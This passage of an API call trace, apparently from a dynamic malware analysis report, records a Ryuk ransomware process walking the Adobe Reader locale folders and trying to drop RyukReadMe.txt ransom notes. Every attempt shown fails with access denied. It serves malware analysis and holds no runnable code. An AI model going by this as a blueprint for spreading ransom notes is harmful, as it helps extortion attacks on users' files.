lpOverlapped=0x0) returned 0 [0138.660] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.660] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.660] SetLastError (dwErrCode=0x0) [0138.660] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.660] GetLastError () returned 0x5 [0138.660] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.660] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.660] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.662] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.662] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.667] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.667] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.667] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.667] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.667] SetLastError (dwErrCode=0x0) [0138.667] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.667] GetLastError () returned 0x5 [0138.668] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.668] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.668] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.668] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.669] SetLastError (dwErrCode=0x0) [0138.669] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.669] GetLastError () returned 0x5 [0138.669] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.669] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.669] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.669] SetLastError (dwErrCode=0x0) [0138.669] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.669] GetLastError () returned 0x5 [0138.669] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.669] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.669] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.670] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.670] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.673] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.674] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.674] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.675] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.675] SetLastError (dwErrCode=0x0) [0138.675] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.676] GetLastError () returned 0x5 [0138.676] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.676] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.676] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.676] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.676] SetLastError (dwErrCode=0x0) [0138.676] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.676] GetLastError () returned 0x5 [0138.676] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.677] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.677] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.677] SetLastError (dwErrCode=0x0) [0138.677] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.677] GetLastError () returned 0x5 [0138.677] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.677] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.677] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.678] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.678] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.684] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.684] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.684] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.684] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.685] SetLastError (dwErrCode=0x0) [0138.685] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.685] GetLastError () returned 0x5 [0138.685] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.685] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.685] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.685] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.685] SetLastError (dwErrCode=0x0) [0138.685] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.686] GetLastError () returned 0x5 [0138.686] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.686] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.686] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.686] SetLastError (dwErrCode=0x0) [0138.686] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.686] GetLastError () returned 0x5 [0138.686] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.686] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.686] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.688] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.688] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.694] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.697] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.698] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.698] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.698] SetLastError (dwErrCode=0x0) [0138.698] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.698] GetLastError () returned 0x5 [0138.698] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.698] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.699] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.700] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.700] SetLastError (dwErrCode=0x0) [0138.700] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.700] GetLastError () returned 0x5 [0138.700] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.700] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.700] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.700] SetLastError (dwErrCode=0x0) [0138.700] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.700] GetLastError () returned 0x5 [0138.700] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.700] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.700] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.702] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.702] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.706] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.707] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.707] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.707] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.707] SetLastError (dwErrCode=0x0) [0138.707] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.707] GetLastError () returned 0x5 [0138.707] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.707] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.707] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.708] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.708] SetLastError (dwErrCode=0x0) [0138.708] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.708] GetLastError () returned 0x5 [0138.708] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.708] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.708] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.708] SetLastError (dwErrCode=0x0) [0138.708] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.709] GetLastError () returned 0x5 [0138.709] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.709] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.709] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.710] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.710] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.714] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.714] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.714] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.715] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.715] SetLastError (dwErrCode=0x0) [0138.715] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.715] GetLastError () returned 0x5 [0138.715] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.715] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.715] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.716] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.716] SetLastError (dwErrCode=0x0) [0138.716] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.716] GetLastError () returned 0x5 [0138.716] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.716] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.716] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.716] SetLastError (dwErrCode=0x0) [0138.716] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.716] GetLastError () returned 0x5 [0138.716] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.716] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.716] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.718] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.718] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.721] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.722] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.722] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.722] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.722] SetLastError (dwErrCode=0x0) [0138.722] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.722] GetLastError () returned 0x5 [0138.722] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.722] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.722] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.723] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.723] SetLastError (dwErrCode=0x0) [0138.723] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.723] GetLastError () returned 0x5 [0138.723] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.723] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.723] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.723] SetLastError (dwErrCode=0x0) [0138.723] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.723] GetLastError () returned 0x5 [0138.723] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 